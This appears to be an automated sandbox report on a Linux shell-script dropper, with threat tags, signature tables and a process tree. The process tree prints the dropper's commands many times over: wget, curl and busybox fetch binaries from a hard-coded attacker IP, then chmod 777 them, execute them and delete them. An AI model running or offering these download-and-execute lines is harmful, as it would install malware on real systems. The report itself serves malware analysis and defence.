Malware Analysis Report

2025-05-06 04:15

Sample ID 241025-bnebts1alj
Target 2100317beeaace5a46e14c17593a94ff209c3b76f3d27dab340222562ec6e760.sh
SHA256 2100317beeaace5a46e14c17593a94ff209c3b76f3d27dab340222562ec6e760
Tags
defense_evasion discovery antivm
score
7/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral3

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral4

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
7/10

SHA256

2100317beeaace5a46e14c17593a94ff209c3b76f3d27dab340222562ec6e760

Threat Level: Shows suspicious behavior

The file 2100317beeaace5a46e14c17593a94ff209c3b76f3d27dab340222562ec6e760.sh was found to be: Shows suspicious behavior.

Malicious Activity Summary

defense_evasion discovery antivm

File and Directory Permissions Modification

Executes dropped EXE

Checks CPU configuration

Reads runtime system information

System Network Configuration Discovery

Writes file to tmp directory

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-10-25 01:17

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-10-25 01:17

Reported

2024-10-25 01:20

Platform

ubuntu1804-amd64-20240611-en

Max time kernel

28s

Max time network

132s

Command Line

[/tmp/2100317beeaace5a46e14c17593a94ff209c3b76f3d27dab340222562ec6e760.sh]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/fSFg8CYsr2jNHC8YKDet8exWxLqqmxltXC /tmp/fSFg8CYsr2jNHC8YKDet8exWxLqqmxltXC N/A
N/A /tmp/l2NdBtLTU30xzBIFpI2vEhX33o2MOa6fEe /tmp/l2NdBtLTU30xzBIFpI2vEhX33o2MOa6fEe N/A
N/A /tmp/vU5kFZPMpyNOgBniLlsIpp016QT8mdS7hB /tmp/vU5kFZPMpyNOgBniLlsIpp016QT8mdS7hB N/A
N/A /tmp/3wjKNQukH3zPDu3GUc3pHuzwNAme9R26N3 /tmp/3wjKNQukH3zPDu3GUc3pHuzwNAme9R26N3 N/A
N/A /tmp/aJ8mBEw8J1n9iF9DmEWtYKluBtVnfHaMcl /tmp/aJ8mBEw8J1n9iF9DmEWtYKluBtVnfHaMcl N/A
N/A /tmp/c8HPjDdggg6ogMyTV13xZmw0Xkrp7JMGHV /tmp/c8HPjDdggg6ogMyTV13xZmw0Xkrp7JMGHV N/A
N/A /tmp/mJVM976eVjlNBG36PeXQljWUiqGpSHpjvr /tmp/mJVM976eVjlNBG36PeXQljWUiqGpSHpjvr N/A
N/A /tmp/Eao8yBxakfFhFBrYulCxwHkhogfz62WuMr /tmp/Eao8yBxakfFhFBrYulCxwHkhogfz62WuMr N/A
N/A /tmp/PR9ws5Ov1kUsYoBhMyIvYtLBxw9dyJzDTC /tmp/PR9ws5Ov1kUsYoBhMyIvYtLBxw9dyJzDTC N/A
N/A /tmp/EhPlGzZ4huBRFXoDM2NqgprO85Hjsg9lVm /tmp/EhPlGzZ4huBRFXoDM2NqgprO85Hjsg9lVm N/A
N/A /tmp/q0BsMeHJ1DP0njz40UPgh5zIC1oY7JXTff /tmp/q0BsMeHJ1DP0njz40UPgh5zIC1oY7JXTff N/A
N/A /tmp/KjdXLyKQeWfdyBEwQkE5WGtQeVv1tCI2Sp /tmp/KjdXLyKQeWfdyBEwQkE5WGtQeVv1tCI2Sp N/A
N/A /tmp/yVQiBcOU0XgDAdH5amMnjEj4kzaCP6sIzV /tmp/yVQiBcOU0XgDAdH5amMnjEj4kzaCP6sIzV N/A
N/A /tmp/ICB8C5Yc3oHcodVdcKKZMAJirxuiLVc5Ad /tmp/ICB8C5Yc3oHcodVdcKKZMAJirxuiLVc5Ad N/A
N/A /tmp/ICB8C5Yc3oHcodVdcKKZMAJirxuiLVc5Ad /tmp/ICB8C5Yc3oHcodVdcKKZMAJirxuiLVc5Ad N/A
N/A /tmp/q0BsMeHJ1DP0njz40UPgh5zIC1oY7JXTff /tmp/q0BsMeHJ1DP0njz40UPgh5zIC1oY7JXTff N/A
N/A /tmp/KjdXLyKQeWfdyBEwQkE5WGtQeVv1tCI2Sp /tmp/KjdXLyKQeWfdyBEwQkE5WGtQeVv1tCI2Sp N/A
N/A /tmp/yVQiBcOU0XgDAdH5amMnjEj4kzaCP6sIzV /tmp/yVQiBcOU0XgDAdH5amMnjEj4kzaCP6sIzV N/A
N/A /tmp/3wjKNQukH3zPDu3GUc3pHuzwNAme9R26N3 /tmp/3wjKNQukH3zPDu3GUc3pHuzwNAme9R26N3 N/A
N/A /tmp/aJ8mBEw8J1n9iF9DmEWtYKluBtVnfHaMcl /tmp/aJ8mBEw8J1n9iF9DmEWtYKluBtVnfHaMcl N/A
N/A /tmp/c8HPjDdggg6ogMyTV13xZmw0Xkrp7JMGHV /tmp/c8HPjDdggg6ogMyTV13xZmw0Xkrp7JMGHV N/A
N/A /tmp/fSFg8CYsr2jNHC8YKDet8exWxLqqmxltXC /tmp/fSFg8CYsr2jNHC8YKDet8exWxLqqmxltXC N/A
N/A /tmp/l2NdBtLTU30xzBIFpI2vEhX33o2MOa6fEe /tmp/l2NdBtLTU30xzBIFpI2vEhX33o2MOa6fEe N/A
N/A /tmp/vU5kFZPMpyNOgBniLlsIpp016QT8mdS7hB /tmp/vU5kFZPMpyNOgBniLlsIpp016QT8mdS7hB N/A
N/A /tmp/mJVM976eVjlNBG36PeXQljWUiqGpSHpjvr /tmp/mJVM976eVjlNBG36PeXQljWUiqGpSHpjvr N/A
N/A /tmp/EhPlGzZ4huBRFXoDM2NqgprO85Hjsg9lVm /tmp/EhPlGzZ4huBRFXoDM2NqgprO85Hjsg9lVm N/A
N/A /tmp/Eao8yBxakfFhFBrYulCxwHkhogfz62WuMr /tmp/Eao8yBxakfFhFBrYulCxwHkhogfz62WuMr N/A
N/A /tmp/PR9ws5Ov1kUsYoBhMyIvYtLBxw9dyJzDTC /tmp/PR9ws5Ov1kUsYoBhMyIvYtLBxw9dyJzDTC N/A

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /tmp/vU5kFZPMpyNOgBniLlsIpp016QT8mdS7hB N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/rm N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/rm N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /tmp/vU5kFZPMpyNOgBniLlsIpp016QT8mdS7hB N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/l2NdBtLTU30xzBIFpI2vEhX33o2MOa6fEe /usr/bin/curl N/A
File opened for modification /tmp/KjdXLyKQeWfdyBEwQkE5WGtQeVv1tCI2Sp /usr/bin/curl N/A
File opened for modification /tmp/vU5kFZPMpyNOgBniLlsIpp016QT8mdS7hB /usr/bin/curl N/A
File opened for modification /tmp/PR9ws5Ov1kUsYoBhMyIvYtLBxw9dyJzDTC /usr/bin/curl N/A
File opened for modification /tmp/yVQiBcOU0XgDAdH5amMnjEj4kzaCP6sIzV /usr/bin/curl N/A
File opened for modification /tmp/q0BsMeHJ1DP0njz40UPgh5zIC1oY7JXTff /usr/bin/curl N/A
File opened for modification /tmp/3wjKNQukH3zPDu3GUc3pHuzwNAme9R26N3 /usr/bin/curl N/A
File opened for modification /tmp/c8HPjDdggg6ogMyTV13xZmw0Xkrp7JMGHV /usr/bin/curl N/A
File opened for modification /tmp/fSFg8CYsr2jNHC8YKDet8exWxLqqmxltXC /usr/bin/curl N/A
File opened for modification /tmp/ICB8C5Yc3oHcodVdcKKZMAJirxuiLVc5Ad /usr/bin/curl N/A
File opened for modification /tmp/q0BsMeHJ1DP0njz40UPgh5zIC1oY7JXTff /usr/bin/curl N/A
File opened for modification /tmp/KjdXLyKQeWfdyBEwQkE5WGtQeVv1tCI2Sp /usr/bin/curl N/A
File opened for modification /tmp/yVQiBcOU0XgDAdH5amMnjEj4kzaCP6sIzV /usr/bin/curl N/A
File opened for modification /tmp/aJ8mBEw8J1n9iF9DmEWtYKluBtVnfHaMcl /usr/bin/curl N/A
File opened for modification /tmp/aJ8mBEw8J1n9iF9DmEWtYKluBtVnfHaMcl /usr/bin/curl N/A
File opened for modification /tmp/mJVM976eVjlNBG36PeXQljWUiqGpSHpjvr /usr/bin/curl N/A
File opened for modification /tmp/ICB8C5Yc3oHcodVdcKKZMAJirxuiLVc5Ad /usr/bin/curl N/A
File opened for modification /tmp/mJVM976eVjlNBG36PeXQljWUiqGpSHpjvr /usr/bin/curl N/A
File opened for modification /tmp/3wjKNQukH3zPDu3GUc3pHuzwNAme9R26N3 /usr/bin/curl N/A
File opened for modification /tmp/Eao8yBxakfFhFBrYulCxwHkhogfz62WuMr /usr/bin/curl N/A
File opened for modification /tmp/EhPlGzZ4huBRFXoDM2NqgprO85Hjsg9lVm /usr/bin/curl N/A
File opened for modification /tmp/c8HPjDdggg6ogMyTV13xZmw0Xkrp7JMGHV /usr/bin/curl N/A
File opened for modification /tmp/fSFg8CYsr2jNHC8YKDet8exWxLqqmxltXC /usr/bin/curl N/A
File opened for modification /tmp/l2NdBtLTU30xzBIFpI2vEhX33o2MOa6fEe /usr/bin/curl N/A
File opened for modification /tmp/PR9ws5Ov1kUsYoBhMyIvYtLBxw9dyJzDTC /usr/bin/curl N/A
File opened for modification /tmp/vU5kFZPMpyNOgBniLlsIpp016QT8mdS7hB /usr/bin/curl N/A
File opened for modification /tmp/EhPlGzZ4huBRFXoDM2NqgprO85Hjsg9lVm /usr/bin/curl N/A
File opened for modification /tmp/Eao8yBxakfFhFBrYulCxwHkhogfz62WuMr /usr/bin/curl N/A

Processes

/tmp/2100317beeaace5a46e14c17593a94ff209c3b76f3d27dab340222562ec6e760.sh

[/tmp/2100317beeaace5a46e14c17593a94ff209c3b76f3d27dab340222562ec6e760.sh]

/bin/rm

[/bin/rm bins.sh]

/usr/bin/wget

[wget http://87.120.126.196/bins/fSFg8CYsr2jNHC8YKDet8exWxLqqmxltXC]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/fSFg8CYsr2jNHC8YKDet8exWxLqqmxltXC]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/fSFg8CYsr2jNHC8YKDet8exWxLqqmxltXC]

/bin/chmod

[chmod 777 fSFg8CYsr2jNHC8YKDet8exWxLqqmxltXC]

/tmp/fSFg8CYsr2jNHC8YKDet8exWxLqqmxltXC

[./fSFg8CYsr2jNHC8YKDet8exWxLqqmxltXC]

/bin/rm

[rm fSFg8CYsr2jNHC8YKDet8exWxLqqmxltXC]

/usr/bin/wget

[wget http://87.120.126.196/bins/l2NdBtLTU30xzBIFpI2vEhX33o2MOa6fEe]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/l2NdBtLTU30xzBIFpI2vEhX33o2MOa6fEe]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/l2NdBtLTU30xzBIFpI2vEhX33o2MOa6fEe]

/bin/chmod

[chmod 777 l2NdBtLTU30xzBIFpI2vEhX33o2MOa6fEe]

/tmp/l2NdBtLTU30xzBIFpI2vEhX33o2MOa6fEe

[./l2NdBtLTU30xzBIFpI2vEhX33o2MOa6fEe]

/bin/rm

[rm l2NdBtLTU30xzBIFpI2vEhX33o2MOa6fEe]

/usr/bin/wget

[wget http://87.120.126.196/bins/vU5kFZPMpyNOgBniLlsIpp016QT8mdS7hB]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/vU5kFZPMpyNOgBniLlsIpp016QT8mdS7hB]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/vU5kFZPMpyNOgBniLlsIpp016QT8mdS7hB]

/bin/chmod

[chmod 777 vU5kFZPMpyNOgBniLlsIpp016QT8mdS7hB]

/tmp/vU5kFZPMpyNOgBniLlsIpp016QT8mdS7hB

[./vU5kFZPMpyNOgBniLlsIpp016QT8mdS7hB]

/bin/rm

[rm vU5kFZPMpyNOgBniLlsIpp016QT8mdS7hB]

/usr/bin/wget

[wget http://87.120.126.196/bins/3wjKNQukH3zPDu3GUc3pHuzwNAme9R26N3]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/3wjKNQukH3zPDu3GUc3pHuzwNAme9R26N3]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/3wjKNQukH3zPDu3GUc3pHuzwNAme9R26N3]

/bin/chmod

[chmod 777 3wjKNQukH3zPDu3GUc3pHuzwNAme9R26N3]

/tmp/3wjKNQukH3zPDu3GUc3pHuzwNAme9R26N3

[./3wjKNQukH3zPDu3GUc3pHuzwNAme9R26N3]

/bin/rm

[rm 3wjKNQukH3zPDu3GUc3pHuzwNAme9R26N3]

/usr/bin/wget

[wget http://87.120.126.196/bins/aJ8mBEw8J1n9iF9DmEWtYKluBtVnfHaMcl]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/aJ8mBEw8J1n9iF9DmEWtYKluBtVnfHaMcl]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/aJ8mBEw8J1n9iF9DmEWtYKluBtVnfHaMcl]

/bin/chmod

[chmod 777 aJ8mBEw8J1n9iF9DmEWtYKluBtVnfHaMcl]

/tmp/aJ8mBEw8J1n9iF9DmEWtYKluBtVnfHaMcl

[./aJ8mBEw8J1n9iF9DmEWtYKluBtVnfHaMcl]

/bin/rm

[rm aJ8mBEw8J1n9iF9DmEWtYKluBtVnfHaMcl]

/usr/bin/wget

[wget http://87.120.126.196/bins/c8HPjDdggg6ogMyTV13xZmw0Xkrp7JMGHV]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/c8HPjDdggg6ogMyTV13xZmw0Xkrp7JMGHV]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/c8HPjDdggg6ogMyTV13xZmw0Xkrp7JMGHV]

/bin/chmod

[chmod 777 c8HPjDdggg6ogMyTV13xZmw0Xkrp7JMGHV]

/tmp/c8HPjDdggg6ogMyTV13xZmw0Xkrp7JMGHV

[./c8HPjDdggg6ogMyTV13xZmw0Xkrp7JMGHV]

/bin/rm

[rm c8HPjDdggg6ogMyTV13xZmw0Xkrp7JMGHV]

/usr/bin/wget

[wget http://87.120.126.196/bins/mJVM976eVjlNBG36PeXQljWUiqGpSHpjvr]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/mJVM976eVjlNBG36PeXQljWUiqGpSHpjvr]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/mJVM976eVjlNBG36PeXQljWUiqGpSHpjvr]

/bin/chmod

[chmod 777 mJVM976eVjlNBG36PeXQljWUiqGpSHpjvr]

/tmp/mJVM976eVjlNBG36PeXQljWUiqGpSHpjvr

[./mJVM976eVjlNBG36PeXQljWUiqGpSHpjvr]

/bin/rm

[rm mJVM976eVjlNBG36PeXQljWUiqGpSHpjvr]

/usr/bin/wget

[wget http://87.120.126.196/bins/Eao8yBxakfFhFBrYulCxwHkhogfz62WuMr]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/Eao8yBxakfFhFBrYulCxwHkhogfz62WuMr]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/Eao8yBxakfFhFBrYulCxwHkhogfz62WuMr]

/bin/chmod

[chmod 777 Eao8yBxakfFhFBrYulCxwHkhogfz62WuMr]

/tmp/Eao8yBxakfFhFBrYulCxwHkhogfz62WuMr

[./Eao8yBxakfFhFBrYulCxwHkhogfz62WuMr]

/bin/rm

[rm Eao8yBxakfFhFBrYulCxwHkhogfz62WuMr]

/usr/bin/wget

[wget http://87.120.126.196/bins/PR9ws5Ov1kUsYoBhMyIvYtLBxw9dyJzDTC]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/PR9ws5Ov1kUsYoBhMyIvYtLBxw9dyJzDTC]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/PR9ws5Ov1kUsYoBhMyIvYtLBxw9dyJzDTC]

/bin/chmod

[chmod 777 PR9ws5Ov1kUsYoBhMyIvYtLBxw9dyJzDTC]

/tmp/PR9ws5Ov1kUsYoBhMyIvYtLBxw9dyJzDTC

[./PR9ws5Ov1kUsYoBhMyIvYtLBxw9dyJzDTC]

/bin/rm

[rm PR9ws5Ov1kUsYoBhMyIvYtLBxw9dyJzDTC]

/usr/bin/wget

[wget http://87.120.126.196/bins/EhPlGzZ4huBRFXoDM2NqgprO85Hjsg9lVm]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/EhPlGzZ4huBRFXoDM2NqgprO85Hjsg9lVm]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/EhPlGzZ4huBRFXoDM2NqgprO85Hjsg9lVm]

/bin/chmod

[chmod 777 EhPlGzZ4huBRFXoDM2NqgprO85Hjsg9lVm]

/tmp/EhPlGzZ4huBRFXoDM2NqgprO85Hjsg9lVm

[./EhPlGzZ4huBRFXoDM2NqgprO85Hjsg9lVm]

/bin/rm

[rm EhPlGzZ4huBRFXoDM2NqgprO85Hjsg9lVm]

/usr/bin/wget

[wget http://87.120.126.196/bins/q0BsMeHJ1DP0njz40UPgh5zIC1oY7JXTff]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/q0BsMeHJ1DP0njz40UPgh5zIC1oY7JXTff]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/q0BsMeHJ1DP0njz40UPgh5zIC1oY7JXTff]

/bin/chmod

[chmod 777 q0BsMeHJ1DP0njz40UPgh5zIC1oY7JXTff]

/tmp/q0BsMeHJ1DP0njz40UPgh5zIC1oY7JXTff

[./q0BsMeHJ1DP0njz40UPgh5zIC1oY7JXTff]

/bin/rm

[rm q0BsMeHJ1DP0njz40UPgh5zIC1oY7JXTff]

/usr/bin/wget

[wget http://87.120.126.196/bins/KjdXLyKQeWfdyBEwQkE5WGtQeVv1tCI2Sp]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/KjdXLyKQeWfdyBEwQkE5WGtQeVv1tCI2Sp]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/KjdXLyKQeWfdyBEwQkE5WGtQeVv1tCI2Sp]

/bin/chmod

[chmod 777 KjdXLyKQeWfdyBEwQkE5WGtQeVv1tCI2Sp]

/tmp/KjdXLyKQeWfdyBEwQkE5WGtQeVv1tCI2Sp

[./KjdXLyKQeWfdyBEwQkE5WGtQeVv1tCI2Sp]

/bin/rm

[rm KjdXLyKQeWfdyBEwQkE5WGtQeVv1tCI2Sp]

/usr/bin/wget

[wget http://87.120.126.196/bins/yVQiBcOU0XgDAdH5amMnjEj4kzaCP6sIzV]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/yVQiBcOU0XgDAdH5amMnjEj4kzaCP6sIzV]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/yVQiBcOU0XgDAdH5amMnjEj4kzaCP6sIzV]

/bin/chmod

[chmod 777 yVQiBcOU0XgDAdH5amMnjEj4kzaCP6sIzV]

/tmp/yVQiBcOU0XgDAdH5amMnjEj4kzaCP6sIzV

[./yVQiBcOU0XgDAdH5amMnjEj4kzaCP6sIzV]

/bin/rm

[rm yVQiBcOU0XgDAdH5amMnjEj4kzaCP6sIzV]

/usr/bin/wget

[wget http://87.120.126.196/bins/ICB8C5Yc3oHcodVdcKKZMAJirxuiLVc5Ad]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/ICB8C5Yc3oHcodVdcKKZMAJirxuiLVc5Ad]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/ICB8C5Yc3oHcodVdcKKZMAJirxuiLVc5Ad]

/bin/chmod

[chmod 777 ICB8C5Yc3oHcodVdcKKZMAJirxuiLVc5Ad]

/tmp/ICB8C5Yc3oHcodVdcKKZMAJirxuiLVc5Ad

[./ICB8C5Yc3oHcodVdcKKZMAJirxuiLVc5Ad]

/bin/rm

[rm ICB8C5Yc3oHcodVdcKKZMAJirxuiLVc5Ad]

/usr/bin/wget

[wget http://87.120.126.196/bins/ICB8C5Yc3oHcodVdcKKZMAJirxuiLVc5Ad]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/ICB8C5Yc3oHcodVdcKKZMAJirxuiLVc5Ad]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/ICB8C5Yc3oHcodVdcKKZMAJirxuiLVc5Ad]

/bin/chmod

[chmod 777 ICB8C5Yc3oHcodVdcKKZMAJirxuiLVc5Ad]

/tmp/ICB8C5Yc3oHcodVdcKKZMAJirxuiLVc5Ad

[./ICB8C5Yc3oHcodVdcKKZMAJirxuiLVc5Ad]

/bin/rm

[rm ICB8C5Yc3oHcodVdcKKZMAJirxuiLVc5Ad]

/usr/bin/wget

[wget http://87.120.126.196/bins/q0BsMeHJ1DP0njz40UPgh5zIC1oY7JXTff]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/q0BsMeHJ1DP0njz40UPgh5zIC1oY7JXTff]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/q0BsMeHJ1DP0njz40UPgh5zIC1oY7JXTff]

/bin/chmod

[chmod 777 q0BsMeHJ1DP0njz40UPgh5zIC1oY7JXTff]

/tmp/q0BsMeHJ1DP0njz40UPgh5zIC1oY7JXTff

[./q0BsMeHJ1DP0njz40UPgh5zIC1oY7JXTff]

/bin/rm

[rm q0BsMeHJ1DP0njz40UPgh5zIC1oY7JXTff]

/usr/bin/wget

[wget http://87.120.126.196/bins/KjdXLyKQeWfdyBEwQkE5WGtQeVv1tCI2Sp]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/KjdXLyKQeWfdyBEwQkE5WGtQeVv1tCI2Sp]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/KjdXLyKQeWfdyBEwQkE5WGtQeVv1tCI2Sp]

/bin/chmod

[chmod 777 KjdXLyKQeWfdyBEwQkE5WGtQeVv1tCI2Sp]

/tmp/KjdXLyKQeWfdyBEwQkE5WGtQeVv1tCI2Sp

[./KjdXLyKQeWfdyBEwQkE5WGtQeVv1tCI2Sp]

/bin/rm

[rm KjdXLyKQeWfdyBEwQkE5WGtQeVv1tCI2Sp]

/usr/bin/wget

[wget http://87.120.126.196/bins/yVQiBcOU0XgDAdH5amMnjEj4kzaCP6sIzV]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/yVQiBcOU0XgDAdH5amMnjEj4kzaCP6sIzV]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/yVQiBcOU0XgDAdH5amMnjEj4kzaCP6sIzV]

/bin/chmod

[chmod 777 yVQiBcOU0XgDAdH5amMnjEj4kzaCP6sIzV]

/tmp/yVQiBcOU0XgDAdH5amMnjEj4kzaCP6sIzV

[./yVQiBcOU0XgDAdH5amMnjEj4kzaCP6sIzV]

/bin/rm

[rm yVQiBcOU0XgDAdH5amMnjEj4kzaCP6sIzV]

/usr/bin/wget

[wget http://87.120.126.196/bins/3wjKNQukH3zPDu3GUc3pHuzwNAme9R26N3]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/3wjKNQukH3zPDu3GUc3pHuzwNAme9R26N3]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/3wjKNQukH3zPDu3GUc3pHuzwNAme9R26N3]

/bin/chmod

[chmod 777 3wjKNQukH3zPDu3GUc3pHuzwNAme9R26N3]

/tmp/3wjKNQukH3zPDu3GUc3pHuzwNAme9R26N3

[./3wjKNQukH3zPDu3GUc3pHuzwNAme9R26N3]

/bin/rm

[rm 3wjKNQukH3zPDu3GUc3pHuzwNAme9R26N3]

/usr/bin/wget

[wget http://87.120.126.196/bins/aJ8mBEw8J1n9iF9DmEWtYKluBtVnfHaMcl]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/aJ8mBEw8J1n9iF9DmEWtYKluBtVnfHaMcl]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/aJ8mBEw8J1n9iF9DmEWtYKluBtVnfHaMcl]

/bin/chmod

[chmod 777 aJ8mBEw8J1n9iF9DmEWtYKluBtVnfHaMcl]

/tmp/aJ8mBEw8J1n9iF9DmEWtYKluBtVnfHaMcl

[./aJ8mBEw8J1n9iF9DmEWtYKluBtVnfHaMcl]

/bin/rm

[rm aJ8mBEw8J1n9iF9DmEWtYKluBtVnfHaMcl]

/usr/bin/wget

[wget http://87.120.126.196/bins/c8HPjDdggg6ogMyTV13xZmw0Xkrp7JMGHV]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/c8HPjDdggg6ogMyTV13xZmw0Xkrp7JMGHV]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/c8HPjDdggg6ogMyTV13xZmw0Xkrp7JMGHV]

/bin/chmod

[chmod 777 c8HPjDdggg6ogMyTV13xZmw0Xkrp7JMGHV]

/tmp/c8HPjDdggg6ogMyTV13xZmw0Xkrp7JMGHV

[./c8HPjDdggg6ogMyTV13xZmw0Xkrp7JMGHV]

/bin/rm

[rm c8HPjDdggg6ogMyTV13xZmw0Xkrp7JMGHV]

/usr/bin/wget

[wget http://87.120.126.196/bins/fSFg8CYsr2jNHC8YKDet8exWxLqqmxltXC]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/fSFg8CYsr2jNHC8YKDet8exWxLqqmxltXC]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/fSFg8CYsr2jNHC8YKDet8exWxLqqmxltXC]

/bin/chmod

[chmod 777 fSFg8CYsr2jNHC8YKDet8exWxLqqmxltXC]

/tmp/fSFg8CYsr2jNHC8YKDet8exWxLqqmxltXC

[./fSFg8CYsr2jNHC8YKDet8exWxLqqmxltXC]

/bin/rm

[rm fSFg8CYsr2jNHC8YKDet8exWxLqqmxltXC]

/usr/bin/wget

[wget http://87.120.126.196/bins/l2NdBtLTU30xzBIFpI2vEhX33o2MOa6fEe]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/l2NdBtLTU30xzBIFpI2vEhX33o2MOa6fEe]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/l2NdBtLTU30xzBIFpI2vEhX33o2MOa6fEe]

/bin/chmod

[chmod 777 l2NdBtLTU30xzBIFpI2vEhX33o2MOa6fEe]

/tmp/l2NdBtLTU30xzBIFpI2vEhX33o2MOa6fEe

[./l2NdBtLTU30xzBIFpI2vEhX33o2MOa6fEe]

/bin/rm

[rm l2NdBtLTU30xzBIFpI2vEhX33o2MOa6fEe]

/usr/bin/wget

[wget http://87.120.126.196/bins/vU5kFZPMpyNOgBniLlsIpp016QT8mdS7hB]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/vU5kFZPMpyNOgBniLlsIpp016QT8mdS7hB]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/vU5kFZPMpyNOgBniLlsIpp016QT8mdS7hB]

/bin/chmod

[chmod 777 vU5kFZPMpyNOgBniLlsIpp016QT8mdS7hB]

/tmp/vU5kFZPMpyNOgBniLlsIpp016QT8mdS7hB

[./vU5kFZPMpyNOgBniLlsIpp016QT8mdS7hB]

/bin/rm

[rm vU5kFZPMpyNOgBniLlsIpp016QT8mdS7hB]

/usr/bin/wget

[wget http://87.120.126.196/bins/mJVM976eVjlNBG36PeXQljWUiqGpSHpjvr]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/mJVM976eVjlNBG36PeXQljWUiqGpSHpjvr]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/mJVM976eVjlNBG36PeXQljWUiqGpSHpjvr]

/bin/chmod

[chmod 777 mJVM976eVjlNBG36PeXQljWUiqGpSHpjvr]

/tmp/mJVM976eVjlNBG36PeXQljWUiqGpSHpjvr

[./mJVM976eVjlNBG36PeXQljWUiqGpSHpjvr]

/bin/rm

[rm mJVM976eVjlNBG36PeXQljWUiqGpSHpjvr]

/usr/bin/wget

[wget http://87.120.126.196/bins/EhPlGzZ4huBRFXoDM2NqgprO85Hjsg9lVm]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/EhPlGzZ4huBRFXoDM2NqgprO85Hjsg9lVm]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/EhPlGzZ4huBRFXoDM2NqgprO85Hjsg9lVm]

/bin/chmod

[chmod 777 EhPlGzZ4huBRFXoDM2NqgprO85Hjsg9lVm]

/tmp/EhPlGzZ4huBRFXoDM2NqgprO85Hjsg9lVm

[./EhPlGzZ4huBRFXoDM2NqgprO85Hjsg9lVm]

/bin/rm

[rm EhPlGzZ4huBRFXoDM2NqgprO85Hjsg9lVm]

/usr/bin/wget

[wget http://87.120.126.196/bins/Eao8yBxakfFhFBrYulCxwHkhogfz62WuMr]

/usr/bin/curl

